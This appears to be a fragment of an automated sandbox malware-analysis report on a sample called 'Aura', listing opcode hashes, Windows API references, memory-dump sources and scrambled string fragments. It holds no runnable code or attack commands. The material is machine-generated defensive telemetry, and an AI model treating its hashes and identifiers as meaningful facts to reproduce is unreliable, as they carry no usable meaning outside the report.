                                                • Opcode ID: a2927cc14d28e318766308e1ba6e630e4977b5c6eba83a1379990f9f9cbd4d0b
                                                • Instruction ID: b17c4c4c8d7c88c5673b4735ba36d86fc1beddd6dd2645deadbc412bbbdfc850
                                                • Opcode Fuzzy Hash: a2927cc14d28e318766308e1ba6e630e4977b5c6eba83a1379990f9f9cbd4d0b
                                                • Instruction Fuzzy Hash: 89216272F01579EEDB218F55C880AAE7A7DEF81A98F114215F825A7B30C730CD028BE1

                                                Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                APIs
                                                • __RTC_Initialize.LIBCMT ref: 6CDC17EE
                                                  • Part of subcall function 6CDC1C6B: InitializeSListHead.KERNEL32(6CE21788,6CDC17F8,6CDD10D8,00000010,6CDC1789,?,?,?,6CDC19B1,?,00000001,?,?,00000001,?,6CDD1120), ref: 6CDC1C70
                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDC1858
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                • String ID:
                                                • API String ID: 3231365870-0
                                                • Opcode ID: e066843aad90c52c1c162e83dac1b8183a78961467da5779f3d47281575b6166
                                                • Instruction ID: c00191a6ddcdd83945bbc8785dc8f83842406802d590d92dcad4d7e7b3d72031
                                                • Opcode Fuzzy Hash: e066843aad90c52c1c162e83dac1b8183a78961467da5779f3d47281575b6166
                                                • Instruction Fuzzy Hash: FA21A132B48221AAEB00ABB484447DDB77C9F4626CF24051AE59127FB1CB26C50DD6B7

                                                Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 6CDC6619
                                                • GetFileType.KERNELBASE(00000000), ref: 6CDC662B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: FileHandleType
                                                • String ID:
                                                • API String ID: 3000768030-0
                                                • Opcode ID: 351d937b9e50c4b9c39784ade68dccf643569511a3604b5b3a5b3a458f51a55c
                                                • Instruction ID: 20cb01baf15eb080a9a5baecb1a7e4cdffaf87c4df5acef88f28bd0a81000116
                                                • Opcode Fuzzy Hash: 351d937b9e50c4b9c39784ade68dccf643569511a3604b5b3a5b3a458f51a55c
                                                • Instruction Fuzzy Hash: 7111A571748751CAD7204B3E8C8463ABAAC9B47338B34079AD1B6D79F1C674D5838647

                                                Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 7be469774f13e7dd9df0588943815cbff2f02e55719a32fe1640dd1b8fb6df20
                                                • Instruction ID: 51868b04563fb5988aa9a1fdd601c4c4b65ec3ef5da3c1d0cfdad539f4196a73
                                                • Opcode Fuzzy Hash: 7be469774f13e7dd9df0588943815cbff2f02e55719a32fe1640dd1b8fb6df20
                                                • Instruction Fuzzy Hash: D8119371B042109BDB209BB9DC01BA932BDAF52778F180717F524DBAE0D7B9DD434252

                                                Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CDC4799,00000001,00000364,00000013,000000FF,?,00000001,6CDC4B88,6CDC4C19,?,?,6CDC3E2C), ref: 6CDC4BD7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: dbd3a01dc939c6b95e5a560b261b116d7cd8314969fd60895af74e23a36c8697
                                                • Instruction ID: 565fd4eedca3e25d3216d76439fbf853b8a14caaedc344e3d185df8722a3870b
                                                • Opcode Fuzzy Hash: dbd3a01dc939c6b95e5a560b261b116d7cd8314969fd60895af74e23a36c8697
                                                • Instruction Fuzzy Hash: 4FF0903574A524A6EB115B2A9800BBB376E9F91664B244211F814A7AA4CA30D90182E3

                                                Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3{5}$6C%E$>O5A$@7QI$\$`c$cGFY$/.-$h~i
                                                • API String ID: 0-1269567263
                                                • Opcode ID: 10c307f406399cff801fe5f52f234a02b5d0f2ae5266a3891d9ad8e35e134f12
                                                • Instruction ID: 38b8b4ff2249272e4c4c9425c3b7ecdc38ce5012cc192626d696d7149fb235a7
                                                • Opcode Fuzzy Hash: 10c307f406399cff801fe5f52f234a02b5d0f2ae5266a3891d9ad8e35e134f12
                                                • Instruction Fuzzy Hash: D4122F72A083018FD720DF65C884B6BFBE1EF85304F158A6CF9959B291D774E906CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: +PQB$N2;4$]`dZ$a]T^$lPkS
                                                • API String ID: 0-3070740194
                                                • Opcode ID: f0c52f030130f251b38661184877e5999dff6719358fa2c42ed5c0678cc3675a
                                                • Instruction ID: f05ec40434a381767ef8c4d9ff3f9762d5790ddee5fa39857b91f90e49635d7e
                                                • Opcode Fuzzy Hash: f0c52f030130f251b38661184877e5999dff6719358fa2c42ed5c0678cc3675a
                                                • Instruction Fuzzy Hash: 1171A1B4508B818BE3368F3585907A7BFE2AF53311F188A6CC5FA1B685C3392506CB55
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CDC1F96
                                                • IsDebuggerPresent.KERNEL32 ref: 6CDC2062
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDC2082
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDC208C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: a5388ad7ae73be26ff2ffb68abc94bce6f411ed9fb6ad6560fa563982b47fca7
                                                • Instruction ID: 72e1764594936e05774a5fe188dfcc40403afd06607b65b63c4b5b45f4ebea56
                                                • Opcode Fuzzy Hash: a5388ad7ae73be26ff2ffb68abc94bce6f411ed9fb6ad6560fa563982b47fca7
                                                • Instruction Fuzzy Hash: 1A315A75E01218DBEF10DF60C9897CDBBB8BF08308F1041AAE509A7250EB705B89DF45
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDC4A12
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDC4A1C
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC4A29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: b7ab6dfb2e7c9d16fd3fee5bfca8d931de7296524c7e516ed527c133b077d4e3
                                                • Instruction ID: 0b9e5bb4c6b56301415193f2530e21abb567b4a4b4bb6bf845edb860954a3683
                                                • Opcode Fuzzy Hash: b7ab6dfb2e7c9d16fd3fee5bfca8d931de7296524c7e516ed527c133b077d4e3
                                                • Instruction Fuzzy Hash: EE31E674E01228EBCB21DF24D8887DDBBB8BF48314F5051DAE41CA72A0EB749B858F55
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,6CDC3714,?,00000001,?,?), ref: 6CDC3737
                                                • TerminateProcess.KERNEL32(00000000,?,6CDC3714,?,00000001,?,?), ref: 6CDC373E
                                                • ExitProcess.KERNEL32 ref: 6CDC3750
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: dd19cd1a6f54cdb658c02fe50ffb52e3841e113deb400586ed09692c4e9d4927
                                                • Instruction ID: 9bdc3232476eeed6596564926401e788bb34bc50fe81123ee540d8cebee122a5
                                                • Opcode Fuzzy Hash: dd19cd1a6f54cdb658c02fe50ffb52e3841e113deb400586ed09692c4e9d4927
                                                • Instruction Fuzzy Hash: D5E04631200248EBCF017B60C848AC87B3DFB81649B000514FA0887A30CB35EAA2EA92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )(,*$eXj1
                                                • API String ID: 0-3627572967
                                                • Opcode ID: 9458030c619538aa755a9e70db64145b0786cfb17033e711a65b8ae71f2ec3c3
                                                • Instruction ID: ee4d069b11ec29097f3f7a97fe3b95c56496b30ed8de92a12c1184db3ea44f6e
                                                • Opcode Fuzzy Hash: 9458030c619538aa755a9e70db64145b0786cfb17033e711a65b8ae71f2ec3c3
                                                • Instruction Fuzzy Hash: 79620270604B408FC736CF39C890666BBE2BF55314B198A6DC4EA8BB92D739F506DB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Y#'-$Y#'-
                                                • API String ID: 0-3648800905
                                                • Opcode ID: c3ff56b8655fc0ca677222b4f4859558fe54342f1fd4de26db47698edff5468a
                                                • Instruction ID: c80dc3867eadeb4ba23b85ebb63ef99c0ffcf5de0a6ecb8e14b59642ca24e187
                                                • Opcode Fuzzy Hash: c3ff56b8655fc0ca677222b4f4859558fe54342f1fd4de26db47698edff5468a
                                                • Instruction Fuzzy Hash: 10D1D1B6A441458FCF04CFBCC9953DE7BF2AB4A354F10A216C456FB7A4C23ADA098B54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                 • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ?I*
                                                • API String ID: 0-3687047043
                                                • Opcode ID: f8c778611659a4c1cb541bdf4504de0f33de42f4081a59d239ae82058cd3b50e
                                                • Instruction ID: e10c43c3606f0915e581169e73aa2632680056ecb25ae1f73c5f70697df5ab59
                                                • Opcode Fuzzy Hash: f8c778611659a4c1cb541bdf4504de0f33de42f4081a59d239ae82058cd3b50e
                                                • Instruction Fuzzy Hash: F7622176F44115CFDB088FBCC9903CD77FAAB4A394F20C115D465EBBA4C62AD90A8B16
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDCAF9C,?,?,00000008,?,?,6CDCAC34,00000000), ref: 6CDCB1CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                 • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 9ebcbec38f98ca2eb63abedd4e9492547d0c97677b2ea2fb23a28f88df3e608b
                                                • Instruction ID: 31db7366818156e93e4f2086f29af67d4f595bfc415a00b4a2d4a0a08e671a4c
                                                • Opcode Fuzzy Hash: 9ebcbec38f98ca2eb63abedd4e9492547d0c97677b2ea2fb23a28f88df3e608b
                                                • Instruction Fuzzy Hash: 11B13731610608EFD705CF28C486B59BBA4FF45368F258659E8E9CF6E1C336E982CB41
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDC216E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                 • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                • Opcode ID: 6776c8a47e1d446a95eb302f2a97eea4833a73cdd59ef09ebe028061bced1c8d
                                                • Instruction ID: b0dae6004e9c68ed3cb5a1b7813f9a4e17e85c0984941d8f7ae89db935290de6
                                                • Opcode Fuzzy Hash: 6776c8a47e1d446a95eb302f2a97eea4833a73cdd59ef09ebe028061bced1c8d
                                                • Instruction Fuzzy Hash: 9C519EB1B01309CBDB0ACF95C8867AAB7F4FB49318F24956AC421EB691D379DA40CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                 • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1409462bba5bfc86acf3aabce6ee59a6857a3876c72ba0bd6c64f859addd2976
                                                • Instruction ID: 86afa5ae031ace51760ca2bf89e2a2bd4f3e33ef277270ab070c6c209b7ad3ce
                                                • Opcode Fuzzy Hash: 1409462bba5bfc86acf3aabce6ee59a6857a3876c72ba0bd6c64f859addd2976
                                                • Instruction Fuzzy Hash: 7041B1B190421DAFDB10DF69CC88AEABBBDEF45304F1442D9E41DD3620EA349E849F60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                 • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5|iL
                                                • API String ID: 0-1880071150
                                                • Opcode ID: 78104efe85f71e5ab9e754fa74a91a6a26cf829f5b4af90054ccae7e1ccce6c7
                                                • Instruction ID: 82c694bdcaffc689c97fa5212da04a015ef831cacda66d7ac434cd3281531a94
                                                • Opcode Fuzzy Hash: 78104efe85f71e5ab9e754fa74a91a6a26cf829f5b4af90054ccae7e1ccce6c7
                                                • Instruction Fuzzy Hash: 84710333A053104FC722AE28DD8136BFB92ABD5724F2EC57DDD989B36AD6309C058781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                 • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 950723044ea2bda713fb4aaf0c1f039c9d703b2cd28a1cce98fd1289990eb26a
                                                • Instruction ID: 1b6b05860988c7e09e48a60abf60387293317b78607c2c827c7aff1f6f0c9eef
                                                • Opcode Fuzzy Hash: 950723044ea2bda713fb4aaf0c1f039c9d703b2cd28a1cce98fd1289990eb26a
                                                • Instruction Fuzzy Hash: 79415871A183008BDB15CF28D891B7B77E0FF95328F05862CE8998B3A1E7359909C786
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                 • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 487762ef7be7cdeea8f8efbac3b0ab244b4cd3cd659ffaf804a689f0052892d6
                                                • Instruction ID: 7c6866225cf29533b89afc3c82612d8e913dfba3f3f4022e65cf1c1e62684bab
                                                • Opcode Fuzzy Hash: 487762ef7be7cdeea8f8efbac3b0ab244b4cd3cd659ffaf804a689f0052892d6
                                                • Instruction Fuzzy Hash: 0DA011303082028BAB008E3A828A3083ABCAA82280308002AA200C0000EE288AC0AA80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                 • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fdd73de9dd52209bfcb22ad514a4a287a63731393cb18d2d1a5e46c36d234d1
                                                • Instruction ID: 9a63177993ebf2270ad9026826d4b9f28f8033bf9896bc02944e70620f2aecec
                                                • Opcode Fuzzy Hash: 2fdd73de9dd52209bfcb22ad514a4a287a63731393cb18d2d1a5e46c36d234d1
                                                • Instruction Fuzzy Hash: C8526AB0209B818ED32A8F3C8855797BFE5AB5A314F148A6DE0FE873D2C7752105CB56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                 • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1064450f975059acd76055d11bc1ed5ec2ea0db93e6fba30adbd93a239cc9f8
                                                • Instruction ID: 998e93256e4100608486daecbb7838eb4997c949e5a61064c872434c58716f42
                                                • Opcode Fuzzy Hash: f1064450f975059acd76055d11bc1ed5ec2ea0db93e6fba30adbd93a239cc9f8
                                                • Instruction Fuzzy Hash: 76D1F7B6A552068FCB04CFBCCD913DD7BF2AB4A365F245216D413E77A4D63A8909CB10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                 • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86fd705ecd07a1c599bba6556a7fe84512ce46315195af01b1dac019c3a406fe
                                                • Instruction ID: 5cf2dd706fb0ccb8f9303aec586316e845730841800e987332b571576361f681
                                                • Opcode Fuzzy Hash: 86fd705ecd07a1c599bba6556a7fe84512ce46315195af01b1dac019c3a406fe
                                                • Instruction Fuzzy Hash: B89125769042614BCB26CE28885066BBB91AB86324F19C63DECBD9B3D2D638CC45D7C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                 • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7ab2f0d74e72c96b1893432cd7a93efc23dd64297d52696129e2fd14b240f9e
                                                • Instruction ID: 380fb9578eafcfb12fdc8b70a0319fbc5f41598934ae0ad317d327d5cbe08078
                                                • Opcode Fuzzy Hash: f7ab2f0d74e72c96b1893432cd7a93efc23dd64297d52696129e2fd14b240f9e
                                                • Instruction Fuzzy Hash: E2613B37A0AD814BD73A893C5C113AB6A875BE3330F3EC76AD5B98B7E1D56988024341
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                 • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 88c2f9913ebd50c4577d94cb52bf2d7d260aa51900c8900def48f7f0b227e4a6
                                                • Instruction ID: b5525ef0f968b9dd199bad4893bc41e78e2bbd18f89fb1915e8c220447480bac
                                                • Opcode Fuzzy Hash: 88c2f9913ebd50c4577d94cb52bf2d7d260aa51900c8900def48f7f0b227e4a6
                                                • Instruction Fuzzy Hash: 04515B37A1DA904BCB166E7C4C412A8AA575BD7230B3E83F6ECB19B3D1C179CC0653A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                 • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd9cbd2b60e59ff4c269f4705751a508f30efbf92afe7f5677a6b131bbec1e8a
                                                • Instruction ID: 267f4db2d9799b60dbb1f010b9733ede6d39a628852236918ab3281715b3eb27
                                                • Opcode Fuzzy Hash: bd9cbd2b60e59ff4c269f4705751a508f30efbf92afe7f5677a6b131bbec1e8a
